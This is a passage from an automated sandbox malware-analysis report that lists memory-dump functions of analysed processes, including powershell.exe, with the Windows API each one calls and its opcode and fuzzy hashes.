                                                        • Opcode ID: a9d9d7ffb89c03d378eaa312ff421a94d59158c3bf7004bd7e64371bf20a8e67
                                                        • Instruction ID: b96ae8adaf85d71d403d68f4031ff96c3cdaeee90847d3d7804ade7ea9034c4d
                                                        • Opcode Fuzzy Hash: a9d9d7ffb89c03d378eaa312ff421a94d59158c3bf7004bd7e64371bf20a8e67
                                                        • Instruction Fuzzy Hash: 5EF0CD35904744DFEB21DF06D8897A6FFA0EF18721F08C09ADD894B356D375A408CAA2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01E9AA42, Relevance: 1.5, APIs: 1, Instructions: 34COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetConsoleOutputCP.KERNEL32 ref: 01E9AA71
                                                        Memory Dump Source
                                                        • Source File: 0000001B.00000002.2157583369.0000000001E9A000.00000040.00000001.sdmp, Offset: 01E9A000, based on PE: false
                                                        Similarity
                                                        • API ID: ConsoleOutput
                                                        • String ID:
                                                        • API String ID: 3985236979-0
                                                        • Opcode ID: ce94a9605329bcfc90bebdd3bf8ac2c7820b3f0cb7b1d5a5a0f937652e2f0b3e
                                                        • Instruction ID: 438ce9c6906248ee4283b96a6bcd0b798df310c8372f54d8fbe91da3734b0497
                                                        • Opcode Fuzzy Hash: ce94a9605329bcfc90bebdd3bf8ac2c7820b3f0cb7b1d5a5a0f937652e2f0b3e
                                                        • Instruction Fuzzy Hash: 48F0F031500B44CFEF20CF09D9897A5FBA0EF84625F48C0AADD094F352D2B8A508CBA2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01E9A974, Relevance: 1.3, APIs: 1, Instructions: 54COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CloseHandle.KERNELBASE(?), ref: 01E9A9C8
                                                        Memory Dump Source
                                                        • Source File: 0000001B.00000002.2157583369.0000000001E9A000.00000040.00000001.sdmp, Offset: 01E9A000, based on PE: false
                                                        Similarity
                                                        • API ID: CloseHandle
                                                        • String ID:
                                                        • API String ID: 2962429428-0
                                                        • Opcode ID: de66595eaa010e610441cb18864c313328a13ce87dee5dd289be74faa4168b78
                                                        • Instruction ID: c415e81ef56636a008c35e33171acdd74ddd26c1b78b8dc8d5e59ce6ae85198d
                                                        • Opcode Fuzzy Hash: de66595eaa010e610441cb18864c313328a13ce87dee5dd289be74faa4168b78
                                                        • Instruction Fuzzy Hash: 0F11A3715093849FDB12CF25DC49B96FFE4EF42224F0980EBED858B253D275A808CB61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01E9A996, Relevance: 1.3, APIs: 1, Instructions: 43COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CloseHandle.KERNELBASE(?), ref: 01E9A9C8
                                                        Memory Dump Source
                                                        • Source File: 0000001B.00000002.2157583369.0000000001E9A000.00000040.00000001.sdmp, Offset: 01E9A000, based on PE: false
                                                        Similarity
                                                        • API ID: CloseHandle
                                                        • String ID:
                                                        • API String ID: 2962429428-0
                                                        • Opcode ID: 21d7d1c44f0feccd5b636b52f729cfb033fbfd0a7b924da7eba6a1e30e865e0e
                                                        • Instruction ID: 802c9a45fd480806e277093371b7d58763e0f00142f0a535f8fee5a7921d157b
                                                        • Opcode Fuzzy Hash: 21d7d1c44f0feccd5b636b52f729cfb033fbfd0a7b924da7eba6a1e30e865e0e
                                                        • Instruction Fuzzy Hash: E601DF75500640CFEB10DF19DC897AAFBA4EF45220F08C0BBDC098B242D279A804CB61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 05810861, Relevance: .0, Instructions: 25COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000001B.00000002.2177209596.0000000005810000.00000040.00000001.sdmp, Offset: 05810000, based on PE: false
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 4bbb1ad89e592db8d366b37e42ee91149c2e51da2b0a8747e473a63c31142807
                                                        • Instruction ID: ece1b238820ca4c11c8bea871427ab3463f1988be034602982acfedbf71963e8
                                                        • Opcode Fuzzy Hash: 4bbb1ad89e592db8d366b37e42ee91149c2e51da2b0a8747e473a63c31142807
                                                        • Instruction Fuzzy Hash: 2FE09A2020E3D00FC7039764A8A05AABFB26E8314870E41EBC582CF1A3CA49484AD753
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01E923F4, Relevance: .0, Instructions: 15COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000001B.00000002.2157549744.0000000001E92000.00000040.00000001.sdmp, Offset: 01E92000, based on PE: false
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 710eb346b0994dd1e29773118fdcbfc65fae8eb8c87c3ffd8f658dbb62e2a2d9
                                                        • Instruction ID: 8abbcc1ac5ef398003de556a54bfcd25af609821b7b99020e593be7c64c7a643
                                                        • Opcode Fuzzy Hash: 710eb346b0994dd1e29773118fdcbfc65fae8eb8c87c3ffd8f658dbb62e2a2d9
                                                        • Instruction Fuzzy Hash: 8BD05B752046815FEB168A1CC154B593BA46F55708F4644F9E940CB663C754E581D200
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01E923BC, Relevance: .0, Instructions: 14COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000001B.00000002.2157549744.0000000001E92000.00000040.00000001.sdmp, Offset: 01E92000, based on PE: false
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: e8ee54e59df55c283b76a11803dec09599b7bde5d9fa65a062e8c1c466697bfa
                                                        • Instruction ID: c4c765653a2f681d098cabdcd9c1c9828caee643173a7fa2ab072b0c78ed433c
                                                        • Opcode Fuzzy Hash: e8ee54e59df55c283b76a11803dec09599b7bde5d9fa65a062e8c1c466697bfa
                                                        • Instruction Fuzzy Hash: E7D05E343006828FEF15CA1CC594F5D77E4AF40704F0644E8BD008B266C3A4E880C600
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Non-executed Functions

                                                        Analysis Process: powershell.exe PID: 3016 Parent PID: 2612 powershell.exeCOMMON

                                                        Executed Functions

                                                        Function 01E0ACB7, Relevance: 1.6, APIs: 1, Instructions: 75COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 01E0AD37
                                                        Memory Dump Source
                                                        • Source File: 0000001D.00000002.2158812232.0000000001E0A000.00000040.00000001.sdmp, Offset: 01E0A000, based on PE: false
                                                        Similarity
                                                        • API ID: AdjustPrivilegesToken
                                                        • String ID:
                                                        • API String ID: 2874748243-0
                                                        • Opcode ID: ffbef58aa0278c361c37d16c155edd448b1c67843a205cd0f1fc5fe73d9d1b95
                                                        • Instruction ID: 80a301aacca42c636c631636642260a053c61de74f581d334ad6b3e6d65d3742
                                                        • Opcode Fuzzy Hash: ffbef58aa0278c361c37d16c155edd448b1c67843a205cd0f1fc5fe73d9d1b95
                                                        • Instruction Fuzzy Hash: 1E21D1765097849FEB23CF25DC44B96BFB4EF06314F0984EAE9848B1A3D2319948DB61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01E0ACEE, Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 01E0AD37
                                                        Memory Dump Source
                                                        • Source File: 0000001D.00000002.2158812232.0000000001E0A000.00000040.00000001.sdmp, Offset: 01E0A000, based on PE: false
                                                        Similarity
                                                        • API ID: AdjustPrivilegesToken
                                                        • String ID:
                                                        • API String ID: 2874748243-0
                                                        • Opcode ID: 35095fd69582ee1d65b00d5694a0ebb3cec1f3d460f862cd5816d2ea4d32a405
                                                        • Instruction ID: f82510a6f76705574b1166e2f34f881aa91d90f3afc2bbab72ef1d993df91f8f
                                                        • Opcode Fuzzy Hash: 35095fd69582ee1d65b00d5694a0ebb3cec1f3d460f862cd5816d2ea4d32a405
                                                        • Instruction Fuzzy Hash: 3B11A076500704DFEB21CF55D884BAAFBE4EF48225F08C46AED498B662D331E454CB61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01E0B2CC, Relevance: 1.6, APIs: 1, Instructions: 50nativeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • NtQuerySystemInformation.NTDLL(?,?,?,?), ref: 01E0B329
                                                        Memory Dump Source
                                                        • Source File: 0000001D.00000002.2158812232.0000000001E0A000.00000040.00000001.sdmp, Offset: 01E0A000, based on PE: false
                                                        Similarity
                                                        • API ID: InformationQuerySystem
                                                        • String ID:
                                                        • API String ID: 3562636166-0
                                                        • Opcode ID: 82a9b7f06e91150096befce0d91244374ca72ef855fc6e98acd26eb065109b7c
                                                        • Instruction ID: 3f575593e5f6d26ce81e57f861746493f1300f8474b693d7dc1f6ddf0fab9920
                                                        • Opcode Fuzzy Hash: 82a9b7f06e91150096befce0d91244374ca72ef855fc6e98acd26eb065109b7c
                                                        • Instruction Fuzzy Hash: 9C11A075508380AFDB228F15DC45F66FFB4EF0A224F09849AED844B663C275A858DB62
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01E0B2EE, Relevance: 1.5, APIs: 1, Instructions: 38nativeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • NtQuerySystemInformation.NTDLL(?,?,?,?), ref: 01E0B329
                                                        Memory Dump Source
                                                        • Source File: 0000001D.00000002.2158812232.0000000001E0A000.00000040.00000001.sdmp, Offset: 01E0A000, based on PE: false
                                                        Similarity
                                                        • API ID: InformationQuerySystem
                                                        • String ID:
                                                        • API String ID: 3562636166-0
                                                        • Opcode ID: 09780bb3516a2634a9bd10babb5121d8e44fb0a9a3f1acb3073ed78e1281a78d
                                                        • Instruction ID: 7f4757df38fa6a930e26cd253aa52f253b40ca05f9c9d43fcf205604adf0d978
                                                        • Opcode Fuzzy Hash: 09780bb3516a2634a9bd10babb5121d8e44fb0a9a3f1acb3073ed78e1281a78d
                                                        • Instruction Fuzzy Hash: BA01A235400700DFEB21DF45D885B65FBA0FF18720F18C49AED490B656C3B9A458DB62
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 02890118, Relevance: 1.6, APIs: 1, Instructions: 100COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SetConsoleTitleW.KERNEL32(?), ref: 028901D0
                                                        Memory Dump Source
                                                        • Source File: 0000001D.00000002.2167179842.0000000002890000.00000040.00000001.sdmp, Offset: 02890000, based on PE: false
                                                        Similarity
                                                        • API ID: ConsoleTitle
                                                        • String ID:
                                                        • API String ID: 3358957663-0
                                                        • Opcode ID: a36535e4965c7e67ac3d135c489599385ea0286ff6369a06a0a2ab05d642cedc
                                                        • Instruction ID: f31e535bdd0d65630638ea782d713923633896af7e544bb15ded04ac71ffc2ef
                                                        • Opcode Fuzzy Hash: a36535e4965c7e67ac3d135c489599385ea0286ff6369a06a0a2ab05d642cedc
                                                        • Instruction Fuzzy Hash: 93314A7650E3C08FEB138B759C65691BFB4AF47210F0E84DBD884CF1A3D6299849DB62
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0289067A, Relevance: 1.6, APIs: 1, Instructions: 93fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 0289072D
                                                        Memory Dump Source
                                                        • Source File: 0000001D.00000002.2167179842.0000000002890000.00000040.00000001.sdmp, Offset: 02890000, based on PE: false
                                                        Similarity
                                                        • API ID: CreateFile
                                                        • String ID:
                                                        • API String ID: 823142352-0
                                                        • Opcode ID: aaaad47a5865ed621366adda7cbe68d1ec49dccfa7099fe58d090ccba7471369
                                                        • Instruction ID: 6ce31cc157c7de87ad1b731ed7a8ae0b6d05d2d382e6fc90c050cb496c0ebe6e
                                                        • Opcode Fuzzy Hash: aaaad47a5865ed621366adda7cbe68d1ec49dccfa7099fe58d090ccba7471369
                                                        • Instruction Fuzzy Hash: 54315075505380AFE722CF65DC85F56BFF8EF06210F09849EE989CB293D365A908CB61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 02890D32, Relevance: 1.6, APIs: 1, Instructions: 89registryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • RegisterEventSourceW.ADVAPI32(?), ref: 02890DD6
                                                        Memory Dump Source
                                                        • Source File: 0000001D.00000002.2167179842.0000000002890000.00000040.00000001.sdmp, Offset: 02890000, based on PE: false
                                                        Similarity
                                                        • API ID: EventRegisterSource
                                                        • String ID:
                                                        • API String ID: 1693822063-0
                                                        • Opcode ID: 6992d0be62f3c3dfe8ef271979ae2c54001fb655e933de63e5edbd06ba692e87
                                                        • Instruction ID: e2c5036ac1fe4692b88d756170427494a182b85e13b175b08311ee6f9e321eff
                                                        • Opcode Fuzzy Hash: 6992d0be62f3c3dfe8ef271979ae2c54001fb655e933de63e5edbd06ba692e87
                                                        • Instruction Fuzzy Hash: 5A319875509380AFE712CB25DC45B96BFE8DF06214F0884AAE948CF293D375A909C772
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01E0AF24, Relevance: 1.6, APIs: 1, Instructions: 88COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • K32EnumProcessModules.KERNEL32(?,00000E9C,8DD6912B,00000000,00000000,00000000,00000000), ref: 01E0AFBE
                                                        Memory Dump Source
                                                        • Source File: 0000001D.00000002.2158812232.0000000001E0A000.00000040.00000001.sdmp, Offset: 01E0A000, based on PE: false
                                                        Similarity
                                                        • API ID: EnumModulesProcess
                                                        • String ID:
                                                        • API String ID: 1082081703-0
                                                        • Opcode ID: 674f14548c3aafdee168ad47466be67ccc4900b61c59fbfabb9727f06b165b08
                                                        • Instruction ID: d4281c512fa054380d5a7c5c9b3cfb140f46df9023b5b478a3c576a3949d16de
                                                        • Opcode Fuzzy Hash: 674f14548c3aafdee168ad47466be67ccc4900b61c59fbfabb9727f06b165b08
                                                        • Instruction Fuzzy Hash: 5D21A5B2509380AFE713CB64DC45B96BFB8EF06320F0884DAE985DB193D2659949C771
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01E0BD1E, Relevance: 1.6, APIs: 1, Instructions: 88COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetTokenInformation.KERNELBASE(?,00000E9C,8DD6912B,00000000,00000000,00000000,00000000), ref: 01E0BDBC
                                                        Memory Dump Source
                                                        • Source File: 0000001D.00000002.2158812232.0000000001E0A000.00000040.00000001.sdmp, Offset: 01E0A000, based on PE: false
                                                        Similarity
                                                        • API ID: InformationToken
                                                        • String ID:
                                                        • API String ID: 4114910276-0
                                                        • Opcode ID: 4bc717d1e70d0381ae55f6c7b531c0bc5c90af573e0e9db78792237b84c85dc0
                                                        • Instruction ID: fc14c22a188b8149731c4d890c4990e7d8344cf77ac08afff0363ad2154f1880
                                                        • Opcode Fuzzy Hash: 4bc717d1e70d0381ae55f6c7b531c0bc5c90af573e0e9db78792237b84c85dc0
                                                        • Instruction Fuzzy Hash: 3731B471409384AFE712CB60DC55F96BFB8EF06210F08849BF984DB193D224A949C7B1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 02890FEE, Relevance: 1.6, APIs: 1, Instructions: 84COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetVolumeInformationW.KERNELBASE(?,00000E9C,?,?), ref: 0289109E
                                                        Memory Dump Source
                                                        • Source File: 0000001D.00000002.2167179842.0000000002890000.00000040.00000001.sdmp, Offset: 02890000, based on PE: false
                                                        Similarity
                                                        • API ID: InformationVolume
                                                        • String ID:
                                                        • API String ID: 2039140958-0
                                                        • Opcode ID: 403a9dbf0d684d2a6f9f2341c10eb02725c1553de59c3d4be2a143f0a715442c
                                                        • Instruction ID: eae42aa7d29a040a191a1f576890414a9c60bdfad2070b5741dc34e1cfdc4312
                                                        • Opcode Fuzzy Hash: 403a9dbf0d684d2a6f9f2341c10eb02725c1553de59c3d4be2a143f0a715442c
                                                        • Instruction Fuzzy Hash: 3831817550E3C06FD3138B358C55B65BFB4AF47610F1A81CBD8848F1A3D228A909C7A2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01E0B01D, Relevance: 1.6, APIs: 1, Instructions: 82COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • K32GetModuleInformation.KERNEL32(?,00000E9C,8DD6912B,00000000,00000000,00000000,00000000), ref: 01E0B0AE
                                                        Memory Dump Source
                                                        • Source File: 0000001D.00000002.2158812232.0000000001E0A000.00000040.00000001.sdmp, Offset: 01E0A000, based on PE: false
                                                        Similarity
                                                        • API ID: InformationModule
                                                        • String ID:
                                                        • API String ID: 3425974696-0
                                                        • Opcode ID: a3a8ca93b128c6d1e0f3a150927d4d5bd4d886b2c1536f0cc7b3378a195575d6
                                                        • Instruction ID: 442095de2b8f67d1aaf6881cd633c9eb6a54e90109dcb8e920794bb2fa7df81a
                                                        • Opcode Fuzzy Hash: a3a8ca93b128c6d1e0f3a150927d4d5bd4d886b2c1536f0cc7b3378a195575d6
                                                        • Instruction Fuzzy Hash: 1B219175505380EFE722CB15DC45FA6BFA8EF06320F08849AF945DB192D664A948CB71
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01E0A1A8, Relevance: 1.6, APIs: 1, Instructions: 80COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SetConsoleCtrlHandler.KERNEL32(?,00000E9C,?,?), ref: 01E0A23E
                                                        Memory Dump Source
                                                        • Source File: 0000001D.00000002.2158812232.0000000001E0A000.00000040.00000001.sdmp, Offset: 01E0A000, based on PE: false
                                                        Similarity
                                                        • API ID: ConsoleCtrlHandler
                                                        • String ID:
                                                        • API String ID: 1513847179-0
                                                        • Opcode ID: 82eddb5339b58147e210bf695b29a079d4979720e80022f818d13692fda7da8e
                                                        • Instruction ID: c6ec9ce7b1d393a9485a64b2e85f4f17958ae8128afcb176a307615d146b3999
                                                        • Opcode Fuzzy Hash: 82eddb5339b58147e210bf695b29a079d4979720e80022f818d13692fda7da8e
                                                        • Instruction Fuzzy Hash: F921B57184D3C0AFD312CB258C55B66BFB4EF47620F1981DBE884CF193D229A919C7A2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 02890784, Relevance: 1.6, APIs: 1, Instructions: 78COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetFileType.KERNELBASE(?,00000E9C,8DD6912B,00000000,00000000,00000000,00000000), ref: 02890819
                                                        Memory Dump Source
                                                        • Source File: 0000001D.00000002.2167179842.0000000002890000.00000040.00000001.sdmp, Offset: 02890000, based on PE: false
                                                        Similarity
                                                        • API ID: FileType
                                                        • String ID:
                                                        • API String ID: 3081899298-0
                                                        • Opcode ID: 321ac6aeccf30a9993de453289cabe6afef041ce05e12c0bca366130db449d08
                                                        • Instruction ID: 9011b2f88ced3b1c3a64dbb50b09062ac6831ad6451470ff0d2826e0aca99688
                                                        • Opcode Fuzzy Hash: 321ac6aeccf30a9993de453289cabe6afef041ce05e12c0bca366130db449d08
                                                        • Instruction Fuzzy Hash: 2D21FF75508780AFE712CB159C45FA3BFA8EF46720F1981DBF9849F153D2246905C771
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 02890464, Relevance: 1.6, APIs: 1, Instructions: 77COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SHGetFolderPathW.SHELL32(?,00000E9C,?,?), ref: 02890502
                                                        Memory Dump Source
                                                        • Source File: 0000001D.00000002.2167179842.0000000002890000.00000040.00000001.sdmp, Offset: 02890000, based on PE: false
                                                        Similarity
                                                        • API ID: FolderPath
                                                        • String ID:
                                                        • API String ID: 1514166925-0
                                                        • Opcode ID: db78565188c09465a07b7c28aa3764ee72920e2bc721939eef269ba3ae5f6b01
                                                        • Instruction ID: 220a2beb363cfea1ab8f36822476a8983eef406d793f48de472ed3a25c97b0d2
                                                        • Opcode Fuzzy Hash: db78565188c09465a07b7c28aa3764ee72920e2bc721939eef269ba3ae5f6b01
                                                        • Instruction Fuzzy Hash: 8621AF7540E3C0AFD3128B358C55B62BFB4EF47610F1A81CBE8848F693D225A919C7B2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 028906AE, Relevance: 1.6, APIs: 1, Instructions: 76fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 0289072D
                                                        Memory Dump Source
                                                        • Source File: 0000001D.00000002.2167179842.0000000002890000.00000040.00000001.sdmp, Offset: 02890000, based on PE: false
                                                        Similarity
                                                        • API ID: CreateFile
                                                        • String ID:
                                                        • API String ID: 823142352-0
                                                        • Opcode ID: 177989cf90c1037842492270b02ccc7617917f448545db778fa5e6a581e86bb8
                                                        • Instruction ID: bf6006ffa7a2a85b48db5feb4353c673756f51c39e89315fac46e2047c6d2e15
                                                        • Opcode Fuzzy Hash: 177989cf90c1037842492270b02ccc7617917f448545db778fa5e6a581e86bb8
                                                        • Instruction Fuzzy Hash: DA21A175500304EFEB20DF65CC85F66FBE8EF08620F08846AE949CB292D332E804CB61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 02890854, Relevance: 1.6, APIs: 1, Instructions: 75fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • ReadFile.KERNELBASE(?,00000E9C,8DD6912B,00000000,00000000,00000000,00000000), ref: 028908E5
                                                        Memory Dump Source
                                                        • Source File: 0000001D.00000002.2167179842.0000000002890000.00000040.00000001.sdmp, Offset: 02890000, based on PE: false
                                                        Similarity
                                                        • API ID: FileRead
                                                        • String ID:
                                                        • API String ID: 2738559852-0
                                                        • Opcode ID: 972a632e9341095e37e7defb48844cbb7cf620e0f8273a5c4b9a8e667aa3de7b
                                                        • Instruction ID: 7047810ee2a9dfa4dc7c51989a5591abad2598b687afaa705d087fcb9d74ff5e
                                                        • Opcode Fuzzy Hash: 972a632e9341095e37e7defb48844cbb7cf620e0f8273a5c4b9a8e667aa3de7b
                                                        • Instruction Fuzzy Hash: 5C219276409380AFEB22CF51DC45F56FFB8EF06314F09849BE9449B153C265A909CB71
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01E0A8B4, Relevance: 1.6, APIs: 1, Instructions: 74threadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SetThreadPreferredUILanguages.KERNEL32(?,00000E9C,?,?), ref: 01E0A94A
                                                        Memory Dump Source
                                                        • Source File: 0000001D.00000002.2158812232.0000000001E0A000.00000040.00000001.sdmp, Offset: 01E0A000, based on PE: false
                                                        Similarity
                                                        • API ID: LanguagesPreferredThread
                                                        • String ID:
                                                        • API String ID: 842807343-0
                                                        • Opcode ID: c8dbdf4c1e8419e82420c5cccc3a01ecb0ce11bbbd4e5c9b28ad7aeb1c3d3886
                                                        • Instruction ID: 90b9cf9d0cd83b30694d2f0225e972a1880c5fd49f3e3fccf4caf1cfbcd666c8
                                                        • Opcode Fuzzy Hash: c8dbdf4c1e8419e82420c5cccc3a01ecb0ce11bbbd4e5c9b28ad7aeb1c3d3886
                                                        • Instruction Fuzzy Hash: D421A77540D780AFD3138B25DC51B62BFB4EF87710F1981DBE8848B653D224A919C7B2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 02890D66, Relevance: 1.6, APIs: 1, Instructions: 71registryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • RegisterEventSourceW.ADVAPI32(?), ref: 02890DD6
                                                        Memory Dump Source
                                                        • Source File: 0000001D.00000002.2167179842.0000000002890000.00000040.00000001.sdmp, Offset: 02890000, based on PE: false
                                                        Similarity
                                                        • API ID: EventRegisterSource
                                                        • String ID:
                                                        • API String ID: 1693822063-0
                                                        • Opcode ID: 8c41f6788928113649f1930e8b24b294eb33b41ddd88ad99059972b676b56cb1
                                                        • Instruction ID: 4c32ea05ff2fd45da1da9c04c167dd5f653f97df5c620efa13312434fe2e5309
                                                        • Opcode Fuzzy Hash: 8c41f6788928113649f1930e8b24b294eb33b41ddd88ad99059972b676b56cb1
                                                        • Instruction Fuzzy Hash: 6B21A475500204AFFB20DF29DC85B66FBD8EF04614F08856AE948DB242D775F904CA61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01E0BD52, Relevance: 1.6, APIs: 1, Instructions: 69COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetTokenInformation.KERNELBASE(?,00000E9C,8DD6912B,00000000,00000000,00000000,00000000), ref: 01E0BDBC
                                                        Memory Dump Source
                                                        • Source File: 0000001D.00000002.2158812232.0000000001E0A000.00000040.00000001.sdmp, Offset: 01E0A000, based on PE: false
                                                        Similarity
                                                        • API ID: InformationToken
                                                        • String ID:
                                                        • API String ID: 4114910276-0
                                                        • Opcode ID: 17b440ef3da77887223132fd7ea268849866a50fb9c2fc01b8770314b96dfb88
                                                        • Instruction ID: 145f3af4e5a9f4c0dc0ac3278ddf8640f262edf71eeba796b2ac18465a259c8e
                                                        • Opcode Fuzzy Hash: 17b440ef3da77887223132fd7ea268849866a50fb9c2fc01b8770314b96dfb88
                                                        • Instruction Fuzzy Hash: 7011AF76500304EFEB22DF55DC85FAAFBACEF08320F14856AF945DA181D674A9448BB1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 02890F34, Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetDriveTypeW.KERNELBASE(?), ref: 02890FB0
                                                        Memory Dump Source
                                                        • Source File: 0000001D.00000002.2167179842.0000000002890000.00000040.00000001.sdmp, Offset: 02890000, based on PE: false
                                                        Similarity
                                                        • API ID: DriveType
                                                        • String ID:
                                                        • API String ID: 338552980-0
                                                        • Opcode ID: a1e3aa163407ddf8b0e9e947dd28eb72ed7d747247bdc9281db61a59403a5c09
                                                        • Instruction ID: e1f7743b84bc0968bd3e6eb522e53cc2e43dfd707a1b2501d0b691ac0295fe79
                                                        • Opcode Fuzzy Hash: a1e3aa163407ddf8b0e9e947dd28eb72ed7d747247bdc9281db61a59403a5c09
                                                        • Instruction Fuzzy Hash: CC218E7550D7C09FDB12CB25DC55B92BFB4AF03214F0C84DAE888CF693D2649508C762
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0289137E, Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000001D.00000002.2167179842.0000000002890000.00000040.00000001.sdmp, Offset: 02890000, based on PE: false
                                                        Similarity
                                                        • API ID: ConsoleWrite
                                                        • String ID:
                                                        • API String ID: 2657657451-0
                                                        • Opcode ID: 8db2f2dccfd1a26ea45fa4a5e9734261e3996d25bce675fe9e0f74c89a75139b
                                                        • Instruction ID: ec1db5806e21ff8499c35ca1cb3e9f8ab8e8af9b274013b1cc5072141e7b9d5c
                                                        • Opcode Fuzzy Hash: 8db2f2dccfd1a26ea45fa4a5e9734261e3996d25bce675fe9e0f74c89a75139b
                                                        • Instruction Fuzzy Hash: B9219F765083809FEB21CF25DC45B96FFB4EF06220F0884AAED898B562D235A449DB61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01E0B04A, Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • K32GetModuleInformation.KERNEL32(?,00000E9C,8DD6912B,00000000,00000000,00000000,00000000), ref: 01E0B0AE
                                                        Memory Dump Source
                                                        • Source File: 0000001D.00000002.2158812232.0000000001E0A000.00000040.00000001.sdmp, Offset: 01E0A000, based on PE: false
                                                        Similarity
                                                        • API ID: InformationModule
                                                        • String ID:
                                                        • API String ID: 3425974696-0
                                                        • Opcode ID: 66552c056a841e1008320ebb6517f15e4d5b06851de31c34e5c494cc3508db79
                                                        • Instruction ID: 74c678216dd97c13a59b9ba5d7bfd029ce6757672f2e92c25699207eeb103027
                                                        • Opcode Fuzzy Hash: 66552c056a841e1008320ebb6517f15e4d5b06851de31c34e5c494cc3508db79
                                                        • Instruction Fuzzy Hash: EA11B175600300EFFB21DF15DC85FAAFBA8EF04320F14846AED09DB681D674E9448AB1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01E0AAAB, Relevance: 1.6, APIs: 1, Instructions: 66COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 01E0AB1A
                                                        Memory Dump Source
                                                        • Source File: 0000001D.00000002.2158812232.0000000001E0A000.00000040.00000001.sdmp, Offset: 01E0A000, based on PE: false
                                                        Similarity
                                                        • API ID: LookupPrivilegeValue
                                                        • String ID:
                                                        • API String ID: 3899507212-0
                                                        • Opcode ID: 5bfe5b9b2e0dfeef11e7bdcd594b5d917808f2e3b81a5d658f5943c98ae36165
                                                        • Instruction ID: d45049d2f70272ba222f7d4b2428a0348cffee236c9c704752f90ce5c6f2fa05
                                                        • Opcode Fuzzy Hash: 5bfe5b9b2e0dfeef11e7bdcd594b5d917808f2e3b81a5d658f5943c98ae36165
                                                        • Instruction Fuzzy Hash: 402172716053849FE722CF29DC44B66BFA8EF46214F0884AAED49DB293D265E448CB71
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01E0BABE, Relevance: 1.6, APIs: 1, Instructions: 66COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetConsoleScreenBufferInfo.KERNEL32 ref: 01E0BB2F
                                                        Memory Dump Source
